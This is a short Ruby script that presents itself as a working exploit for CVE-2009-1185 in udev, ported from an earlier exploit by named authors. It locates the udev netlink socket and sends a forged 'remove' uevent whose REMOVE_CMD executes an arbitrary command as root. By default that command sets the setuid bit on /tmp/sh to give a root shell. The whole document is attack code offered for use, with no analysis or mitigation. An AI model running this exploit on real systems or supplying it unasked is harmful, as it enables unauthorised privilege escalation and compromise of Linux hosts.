#!/usr/bin/ruby # exploit for CVE-2009-1185 (udev) # ruby port of the sploit of r0ux+ph1l+tr0u (cause ruby is superior) require 'socket' cmd = ARGV.shift || '/bin/chmod u+s /tmp/sh' # pid of the udev netlink socket pid = File.read('/proc/net/netlink')[/\s15\s+(\d+)\s+0*1\s/, 1].to_i s = Socket.new 16, 2, 15 # NETLINK, DGRAM, UDEV s.connect [16, pid, 0].pack('L*') # NETLINK, pid, group # exploit /lib/udev/rules.d/95-late.rules s.send "remove@/\0ACTION=remove\0DEVPATH=/\0SUBSYSTEM=/\0TIMEOUT=1\0REMOVE_CMD=#{cmd}\0", 0